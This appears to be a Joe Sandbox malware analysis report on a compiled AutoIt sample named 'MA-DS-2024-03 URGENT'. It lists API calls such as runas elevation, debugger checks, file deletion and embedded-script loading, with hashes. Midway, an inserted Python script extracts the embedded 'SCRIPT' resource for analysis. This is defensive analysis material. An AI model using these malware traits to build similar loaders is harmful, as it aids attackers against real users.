                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: d$w
                                                        • API String ID: 0-2400632791
                                                        • Opcode ID: d5a786b87fb6df7fdebc00072415fb60341e2b7986f10a07198d8314986f9598
                                                        • Instruction ID: add0354c414c3d509daba610adcdb77f9f3f3ffed35e8a39f517a4a8252611b9
                                                        • Opcode Fuzzy Hash: d5a786b87fb6df7fdebc00072415fb60341e2b7986f10a07198d8314986f9598
                                                        • Instruction Fuzzy Hash: 6CC14971A0C380AFEF374A2C9C58F393E6C5B41AA0F8C019AE746CA3F3D3655905D256

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                                                        • IsDebuggerPresent.KERNEL32 ref: 00403B7A
                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                          • Part of subcall function 0041092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                                                        • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004B7770,00000010), ref: 0043D281
                                                        • SetCurrentDirectoryW.KERNEL32(?,004C52F8,?,?,?), ref: 0043D2B9
                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,004B4260,004C52F8,?,?,?), ref: 0043D33F
                                                        • ShellExecuteW.SHELL32(00000000,?,?), ref: 0043D346
                                                          • Part of subcall function 00403A46: GetSysColorBrush.USER32(0000000F), ref: 00403A50
                                                          • Part of subcall function 00403A46: LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
                                                          • Part of subcall function 00403A46: LoadIconW.USER32(00000063), ref: 00403A76
                                                          • Part of subcall function 00403A46: LoadIconW.USER32(000000A4), ref: 00403A88
                                                          • Part of subcall function 00403A46: LoadIconW.USER32(000000A2), ref: 00403A9A
                                                          • Part of subcall function 00403A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
                                                          • Part of subcall function 00403A46: RegisterClassExW.USER32(?), ref: 00403B16
                                                          • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                                                          • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                                                          • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A38
                                                          • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A41
                                                          • Part of subcall function 0040434A: _memset.LIBCMT ref: 00404370
                                                          • Part of subcall function 0040434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                        • String ID: This is a third-party compiled AutoIt script.$runas$%I
                                                        • API String ID: 529118366-2806069697
                                                        • Opcode ID: b128d0c6ffbd213b78e7c991bc090ab0c4f1b42087612c7af0eba3310dd4a508
                                                        • Instruction ID: 3b6422646bc5bb7d448bfeb78fc2b200dbb07c6b17ab8a28721e135d33d4e7f3
                                                        • Opcode Fuzzy Hash: b128d0c6ffbd213b78e7c991bc090ab0c4f1b42087612c7af0eba3310dd4a508
                                                        • Instruction Fuzzy Hash: 8D519275D08108AADB01AFB5EC05EEE7BB8AB45745B1040BFF811B21E1DA786685CB2D

                                                        Control-flow Graph

                                                        control_flow_graph for function 004049A0 (node and edge listing elided): basic blocks 004049A0-00404B35 plus out-of-line blocks 0043D767-0043D894, calling GetVersionExW, GetCurrentProcess, IsWow64Process, GetNativeSystemInfo, FreeLibrary and GetSystemInfo
                                                        APIs
                                                        • GetVersionExW.KERNEL32(?), ref: 004049CD
                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                        • GetCurrentProcess.KERNEL32(?,0048FAEC,00000000,00000000,?), ref: 00404A9A
                                                        • IsWow64Process.KERNEL32(00000000), ref: 00404AA1
                                                        • GetNativeSystemInfo.KERNEL32(00000000), ref: 00404AE7
                                                        • FreeLibrary.KERNEL32(00000000), ref: 00404AF2
                                                        • GetSystemInfo.KERNEL32(00000000), ref: 00404B23
                                                        • GetSystemInfo.KERNEL32(00000000), ref: 00404B2F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                        • String ID:
                                                        • API String ID: 1986165174-0
                                                        • Opcode ID: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                                                        • Instruction ID: 9368d54b81b13d28e750e9b7a77ce7499fab44d9898740901c219fded0589530
                                                        • Opcode Fuzzy Hash: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                                                        • Instruction Fuzzy Hash: 7A91A4719897C0DACB21DBA894501ABBFF5AF69300F444D6FD1C6A3B41D238B908C76E

                                                        Control-flow Graph

                                                        control_flow_graph for function 00404E89 (node and edge listing elided): basic blocks 00404E89-00404EC6 plus out-of-line blocks 0043D933-0043D98B, calling CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource and LockResource
                                                        APIs
                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00404D8E,?,?,00000000,00000000), ref: 00404E99
                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00404D8E,?,?,00000000,00000000), ref: 00404EB0
                                                        • LoadResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D937
                                                        • SizeofResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D94C
                                                        • LockResource.KERNEL32(00404D8E,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F,00000000), ref: 0043D95F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                        • String ID: SCRIPT
                                                        • API String ID: 3051347437-3967369404
                                                        • Opcode ID: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
                                                        • Instruction ID: 68981a4d98a1b9f26aaf18e99fd77eadcf83d6f3c297b7fdd3b7e429ee84fbe5
                                                        • Opcode Fuzzy Hash: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
                                                        • Instruction Fuzzy Hash: 59119EB0200300BFD7208B65EC48F2B7BBAFBC9B11F20467DF505D62A0DB71E8058665
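The five calls in the block above are the compiled-AutoIt loader fetching its embedded script: FindResourceExW with type 0000000A (RT_RCDATA) and the name "SCRIPT", then LoadResource, SizeofResource and LockResource, with the bytes handed to a CreateStreamOnHGlobal stream. The same lookup can be done statically to pull the script blob out of the sample for decompilation. The Python below is an added example written for this report, not code from Joe Sandbox, AutoIt or the sample: it walks the PE resource tree with only the standard library, matching the resource name case-insensitively as FindResourceExW does, and builds a constructed minimal PE so it runs offline. The payload it embeds is a placeholder, not an AutoIt script; the function does not decode the AutoIt script format, it only returns the raw resource bytes.

```python
import struct
import sys

# Resource type the loader asks for: FindResourceExW(hModule, RT_RCDATA (0xA), L"SCRIPT", 0)
RT_RCDATA = 10
IS_SUBDIR = 0x80000000  # high bit of a directory entry: offset points to another directory (or a name string)


def _rva_to_offset(pe, rva):
    """Map a relative virtual address to a file offset through the section table."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    num_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size
    for i in range(num_sections):
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, table + 40 * i + 8)
        if va <= rva < va + max(vsize, raw_size):
            return raw_ptr + (rva - va)
    raise ValueError("RVA 0x%x is not backed by any section" % rva)


def _entries(pe, rsrc, dir_off):
    """Yield (name_field, data_field) of every entry in one IMAGE_RESOURCE_DIRECTORY."""
    n_named, n_id = struct.unpack_from("<HH", pe, rsrc + dir_off + 12)
    for i in range(n_named + n_id):
        yield struct.unpack_from("<II", pe, rsrc + dir_off + 16 + 8 * i)


def _name(pe, rsrc, field):
    """Decode an entry name: an integer ID, or IMAGE_RESOURCE_DIR_STRING_U (u16 length + UTF-16LE)."""
    if field & IS_SUBDIR:
        off = rsrc + (field & 0x7FFFFFFF)
        n = struct.unpack_from("<H", pe, off)[0]
        return pe[off + 2:off + 2 + 2 * n].decode("utf-16-le")
    return field


def _same(a, b):
    # FindResourceExW matches string names case-insensitively; numeric IDs must match exactly.
    if isinstance(a, str) and isinstance(b, str):
        return a.upper() == b.upper()
    return a == b


def find_resource(pe, res_type, res_name):
    """Return the bytes of resource <res_type>/<res_name> (first language found), or None."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", pe, opt)[0]
    dir_base = 96 if magic == 0x10B else 112  # data-directory offset: PE32 vs PE32+
    rsrc_rva = struct.unpack_from("<I", pe, opt + dir_base + 2 * 8)[0]  # directory entry 2 = resources
    if rsrc_rva == 0:
        return None
    rsrc = _rva_to_offset(pe, rsrc_rva)
    for t_field, t_off in _entries(pe, rsrc, 0):  # level 1: type
        if not _same(_name(pe, rsrc, t_field), res_type) or not (t_off & IS_SUBDIR):
            continue
        for n_field, n_off in _entries(pe, rsrc, t_off & 0x7FFFFFFF):  # level 2: name
            if not _same(_name(pe, rsrc, n_field), res_name) or not (n_off & IS_SUBDIR):
                continue
            for _lang, leaf in _entries(pe, rsrc, n_off & 0x7FFFFFFF):  # level 3: language -> data entry
                data_rva, size = struct.unpack_from("<II", pe, rsrc + leaf)
                start = _rva_to_offset(pe, data_rva)
                return pe[start:start + size]
    return None


def build_sample_pe(payload):
    """Constructed input: a minimal PE32 whose only section is .rsrc carrying RT_RCDATA/"SCRIPT"."""
    sect_rva, raw_ptr = 0x1000, 0x200

    def directory(entries):
        named = sum(1 for n, _ in entries if n & IS_SUBDIR)
        hdr = struct.pack("<IIHHHH", 0, 0, 0, 0, named, len(entries) - named)
        return hdr + b"".join(struct.pack("<II", n, o) for n, o in entries)

    # Section layout: root dir @0, RCDATA dir @24, SCRIPT dir @48, data entry @72, name string @88, payload @104
    rsrc = bytearray(104 + len(payload))
    rsrc[0:24] = directory([(RT_RCDATA, IS_SUBDIR | 24)])
    rsrc[24:48] = directory([(IS_SUBDIR | 88, IS_SUBDIR | 48)])
    rsrc[48:72] = directory([(0x409, 72)])
    rsrc[72:88] = struct.pack("<IIII", sect_rva + 104, len(payload), 0, 0)
    rsrc[88:102] = struct.pack("<H", 6) + "SCRIPT".encode("utf-16-le")
    rsrc[104:] = payload

    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)  # PE32 magic
    struct.pack_into("<I", opt, 92, 16)  # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 2 * 8, sect_rva, len(rsrc))  # resource data directory
    sect = b".rsrc".ljust(8, b"\0") + struct.pack("<IIIIIIHHI", len(rsrc), sect_rva, len(rsrc), raw_ptr, 0, 0, 0, 0, 0x40000040)
    headers = dos + b"PE\0\0" + file_hdr + bytes(opt) + sect
    return headers.ljust(raw_ptr, b"\0") + bytes(rsrc)


if __name__ == "__main__":
    # Usage: python extract_script_resource.py <sample.exe> <out.bin>; with no arguments, runs on the constructed PE.
    if len(sys.argv) == 3:
        blob = find_resource(open(sys.argv[1], "rb").read(), RT_RCDATA, "SCRIPT")
        if blob is None:
            sys.exit("no RT_RCDATA/SCRIPT resource found")
        open(sys.argv[2], "wb").write(blob)
        print("wrote %d bytes" % len(blob))
    else:
        sample = build_sample_pe(b"constructed placeholder, not a real compiled AutoIt script")
        print(find_resource(sample, RT_RCDATA, "SCRIPT"))
```

Running it against the submitted sample would give the raw "SCRIPT" blob; whether that blob is a genuine AutoIt script is decided by the AutoIt decompiler, not by this extractor, and a sample that ships a stub or packed script in that resource will still return bytes here.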
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID: pbL$%I
                                                        • API String ID: 3964851224-1578263234
                                                        • Opcode ID: c37b66ce17b1354f57705c901a6f2f94cef4c8c8aaee3654f7ad124679c9c54b
                                                        • Instruction ID: 7d186bf48a599790b4ae94b3728c2257f551fe3f353e5d611b392294ecc69107
                                                        • Opcode Fuzzy Hash: c37b66ce17b1354f57705c901a6f2f94cef4c8c8aaee3654f7ad124679c9c54b
                                                        • Instruction Fuzzy Hash: C8927D706043419FD720DF15C480B6BB7E1BF89304F14896EE8999B392D779EC85CB9A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: DdL$DdL$DdL$DdL$Variable must be of type 'Object'.
                                                        • API String ID: 0-2838938394
                                                        • Opcode ID: 320f442f758ecc80b3ddca5034ac15bb90a7fe00f9ba275652cca2b21843bf7d
                                                        • Instruction ID: 023dab180a9d3d77a7e8607c3136a2e1727c845c037ec0be429657ea2820e701
                                                        • Opcode Fuzzy Hash: 320f442f758ecc80b3ddca5034ac15bb90a7fe00f9ba275652cca2b21843bf7d
                                                        • Instruction Fuzzy Hash: C3A29E75A00205CFDB24CF56C480AAAB7B1FF58314F24887BE905AB391D739ED52CB99
                                                        APIs
                                                        • GetFileAttributesW.KERNEL32(?,0043E398), ref: 0046446A
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0046447B
                                                        • FindClose.KERNEL32(00000000), ref: 0046448B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: FileFind$AttributesCloseFirst
                                                        • String ID:
                                                        • API String ID: 48322524-0
                                                        • Opcode ID: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                                                        • Instruction ID: 0270b6235cd3a211ff5fd07bbdee7491b27fcb3ec88e67c823a813e2b68c3cf0
                                                        • Opcode Fuzzy Hash: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                                                        • Instruction Fuzzy Hash: 54E0D8328105006B4610AB78EC0E4EE775C9E85335F100B6AFC35C11D0FB789904969F
                                                        APIs
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410A5B
                                                        • timeGetTime.WINMM ref: 00410D16
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410E53
                                                        • Sleep.KERNEL32(0000000A), ref: 00410E61
                                                        • LockWindowUpdate.USER32(00000000,?,?), ref: 00410EFA
                                                        • DestroyWindow.USER32 ref: 00410F06
                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00410F20
                                                        • Sleep.KERNEL32(0000000A,?,?), ref: 00444E83
                                                        • TranslateMessage.USER32(?), ref: 00445C60
                                                        • DispatchMessageW.USER32(?), ref: 00445C6E
                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00445C82
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                        • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbL$pbL$pbL$pbL
                                                        • API String ID: 4212290369-1082885916
                                                        • Opcode ID: 618afc13f6544c439f6a0b9aa5364fceb3cd83de4d4869231364c61163df425f
                                                        • Instruction ID: d38973a2ad724f636fdb88fa2895c4b9f48f3c0ad1428ec49bcc8c13362f202a
                                                        • Opcode Fuzzy Hash: 618afc13f6544c439f6a0b9aa5364fceb3cd83de4d4869231364c61163df425f
                                                        • Instruction Fuzzy Hash: BBB29470608741DFEB24DF24C445BABB7E4BF84304F14492FE54997292D779E885CB8A
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast
                                                        • String ID:
                                                        • API String ID: 1452528299-0
                                                        • Opcode ID: d2c8b1d5232d0faae8d46e976c38147c8deee6602559387c67272e045cd2d534
                                                        • Instruction ID: e3c8eab8f43b235238a056416cb8f5b486e12f549aba60f080e6c0fe9d809eeb
                                                        • Opcode Fuzzy Hash: d2c8b1d5232d0faae8d46e976c38147c8deee6602559387c67272e045cd2d534
                                                        • Instruction Fuzzy Hash: 81E1376291C34D9BEF374B6C4C087353E6C6B63660F4C468AE756DB3E7D3258809C626

                                                        Control-flow Graph
                                                        • Rendered as an image on the original page (legend: Executed / Not Executed); the graph data is not reproduced here.
                                                        • Function 00469155, basic blocks 00469155 to 00469558; API calls reached from the graph: DeleteFileW, CopyFileW.
                                                        APIs
                                                          • Part of subcall function 00468F5F: __time64.LIBCMT ref: 00468F69
                                                          • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
                                                        • __wsplitpath.LIBCMT ref: 00469234
                                                          • Part of subcall function 004240FB: __wsplitpath_helper.LIBCMT ref: 0042413B
                                                        • _wcscpy.LIBCMT ref: 00469247
                                                        • _wcscat.LIBCMT ref: 0046925A
                                                        • __wsplitpath.LIBCMT ref: 0046927F
                                                        • _wcscat.LIBCMT ref: 00469295
                                                        • _wcscat.LIBCMT ref: 004692A8
                                                          • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FDE
                                                          • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FED
                                                        • _wcscmp.LIBCMT ref: 004691EF
                                                          • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
                                                          • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00469452
                                                        • _wcsncpy.LIBCMT ref: 004694C5
                                                        • DeleteFileW.KERNEL32(?,?), ref: 004694FB
                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00469511
                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469522
                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469534
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                        • String ID:
                                                        • API String ID: 1500180987-0
                                                        • Opcode ID: 72f74135f6da1f003ebd9f44f595e8cd29ac2ed1f7a032e3997be759fd394df1
                                                        • Instruction ID: 02a21988af13e7247216c1d96107bbd8e14577c6ac0cce12fd44c5267f831f24
                                                        • Opcode Fuzzy Hash: 72f74135f6da1f003ebd9f44f595e8cd29ac2ed1f7a032e3997be759fd394df1
                                                        • Instruction Fuzzy Hash: 22C13DB1900129AADF11DF95CC81ADEB7BCEF85314F0040ABF609E6251EB749E858F69

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                        • RegisterClassExW.USER32(00000030), ref: 0040309E
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                        • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                        • LoadIconW.USER32(000000A9), ref: 004030F2
                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
